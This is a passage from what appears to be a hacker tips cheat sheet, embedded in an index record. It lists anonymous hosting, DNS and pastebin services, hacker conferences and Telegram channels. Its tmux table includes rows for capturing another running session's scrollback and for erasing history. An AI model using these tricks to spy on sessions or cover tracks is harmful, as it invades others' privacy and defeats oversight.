[MagicWormhole](https://pypi.org/project/magic-wormhole/)\n\nPublishing\u003ca id=\"pub\"\u003e\u003c/a\u003e\n1. [free BT/DC/eD2k seedbox](https://valdikss.org.ru/schare/)\n1. Or use /onion on [segfault.net](https://www.thc.org/segfault) or plain old https with ngrok.\n1. [DuckDNS](https://www.duckdns.org/) - Free Domain Names\n1. [AnonDNS](https://anondns.net/) - Free Domain Name (anonymous)\n1. [afraid.org](https://www.afraid.org) - Free Dynamic DNS for your domain\n2. [hostwinds](https://hostwinds.com) - Pay with crypto\n3. [unstoppable domains](https://unstoppabledomains.com) - Pay with crypto\n1. [he.net](https://dns.he.net/) - Free Nameserver service\n1. [0bin](https://0bin.net/) / [paste.ec](https://paste.ec) - Encrypted PasteBin\n1. [pad.riseup.net](https://pad.riseup.net) - Create documents and share them securely\n\nForums and Conferences\n1. [AlligatorCon](https://www.alligatorcon.eu/) - the original\n1. [0x41con](https://0x41con.org/)\n1. [TumpiCon](https://tumpicon.org/)\n1. [0x00sec](https://0x00sec.org/)\n\nTelegram Channels\u003ca id=\"channels\"\u003e\u003c/a\u003e\n1. [The Hacker's Choice](https://t.me/thcorg)\n1. [The Hacker News](https://t.me/thehackernews)\n1. [CyberSecurity Technologies](https://t.me/CyberSecurityTechnologies)\n1. [Offensive Twitter](https://t.me/OffensiveTwitter)\n1. [Pwn3rzs](https://t.me/Pwn3rzs)\n1. [VX-Underground](https://t.me/vxunderground)\n1. [Android Security / Malware](https://t.me/androidMalware)\n1. [OSINT CyberDetective](https://t.me/cybdetective)\n1. [BookZillaaa](https://t.me/bookzillaaa)\n\nMindmaps \u0026 Knowledge\n1. [Compass Sec Cheat Sheets](https://github.com/CompassSecurity/Hacking_Tools_Cheat_Sheet)\n2. [Network Pentesting](https://github.com/wearecaster/NetworkNightmare/blob/main/NetworkNightmare_by_Caster.png)\n1. [Active Directory](https://orange-cyberdefense.github.io/ocd-mindmaps/img/pentest_ad_dark_2023_02.svg)\n\n\u003ca id=\"cool-linux-commands\"\u003e\u003c/a\u003e\n**13.ii. 
Cool Linux commands**\n\n1. https://jvns.ca/blog/2022/04/12/a-list-of-new-ish--command-line-tools/\n1. https://github.com/ibraheemdev/modern-unix\n\n\u003ca id=\"tmux\"\u003e\u003c/a\u003e\n**13.iii. Tmux Cheat Sheet**\n\n\n| | Tmux Cheat Sheet |\n| --- | --- |\n| Max Buffer | `Ctrl-b` + `:` + `set-option -g history-limit 65535` |\n| SaveScrollback | `Ctrl-b` + `:` + `capture-pane -S -` followed by `Ctrl-b` + `:` + `save-buffer filename.txt`. |\n| SpyScrollback | `tmux capture-pane -e -pS- -t 6.0` to capture pane 6, window 0 of a running tmux. Remove `-e` to save without colour. |\n| Clear | `tmux send-keys -R C-l \\; clear-history -t6.0` to clear screen and delete scrollback history. |\n| Logging | `Ctrl-b` + `:` + `bind-key P pipe-pane -o \"exec cat \u003e\u003e$HOME/'tmux-#W-#S.log'\" \\; display-message 'Toggling ~/tmux-#W-#","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fhackerschoice%2Fthc-tips-tricks-hacks-cheat-sheet","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fhackerschoice%2Fthc-tips-tricks-hacks-cheat-sheet","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fhackerschoice%2Fthc-tips-tricks-hacks-cheat-sheet/lists"}